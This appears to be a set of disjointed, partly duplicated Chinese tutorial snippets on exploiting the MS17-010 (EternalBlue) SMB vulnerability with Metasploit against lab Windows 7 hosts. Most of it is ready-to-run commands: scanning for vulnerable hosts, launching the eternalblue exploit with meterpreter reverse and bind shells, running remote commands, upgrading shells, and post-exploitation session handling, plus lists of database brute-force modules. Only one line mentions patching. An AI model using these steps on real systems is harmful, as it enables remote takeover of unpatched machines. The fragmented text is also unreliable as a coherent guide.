set command whoami set rhosts 10.0.0.154 #Win7的地址 run 3 ~ MS17-010(auxiliary/scanner/smb/smb_ms17_010) shell search ms17-010 use 3 options set rhosts 10.0.0.154 #Win7的地址 run (2)分别注明0~3漏洞利用模块的攻击效果和利用条件,完成漏洞修复 漏洞修复:Win7中下载ms17-010补丁 再次利用ms...
1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445
msf6 > use auxiliary/scanner/smb/smb_ms17_010 //也可以用 use 3 msf6 auxiliary(scanner/smb...
这里找到了两个模块,第一个辅助模块是探测主机是否存在MS17_010漏洞,第二个是漏洞利用模块,我们先探测哪些主机存在漏洞 Auxiliary辅助探测模块 该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。 输入命令:use auxiliary/scanner/smb/smb_ms17_010 查看这个模块需...
如果先获取了cmd,比如利用ms17-010,默认使用的payload返回的就是cmd。这时候我们可以使用sessions-u 2来将cmdshell升级成meterpreter。 获取到了meterpreter,就可以进行后渗透了。 4.1 基本系统命令 # 会话管理background#将当前会话放置后台sessions# 查看会话sessions -i# 切换会话quit# 关闭当前的会话,返回msf终端# ...
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp run 要是目标系统是 2003x32、Win7x32 的只能使用这个模块去执行命令: msf6> use auxiliary/admin/smb/ms17_010_command msf6> set command whoami msf6> run ...
auxiliary/admin/smb/psexec_command #登录SMB且执行命令 auxiliary/scanner/mssql/mssql_ping #MSSQL主机信息扫描 auxiliary/admin/mssql/mssql_enum #MSSQL枚举 auxiliary/scanner/mysql/mysql_login #MySQL弱口令扫描 auxiliary/admin/mysql/mysql_enum #MySQL枚举 ...
If setting a PAYLOAD, this command can take an index from `show payloads'. msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54 RHOST => 192.168.197.54 msf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.197.54:445 - Host is likely VULNERABLE to MS17-010!
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 使用info查看模块信息: info 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 查看模块需要配置的参数:show options 设置参数:set RHOST 192.168.125.138 攻击:exploit / run ...
使用use 进入模块: use exploit/windows/smb/ms17_010_eternalblue 使用info 查看模块信息: info 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 查看模块需要配置的参数:show options 设置参数:set RHOST 192.168.125.138 攻击:exploit / run ...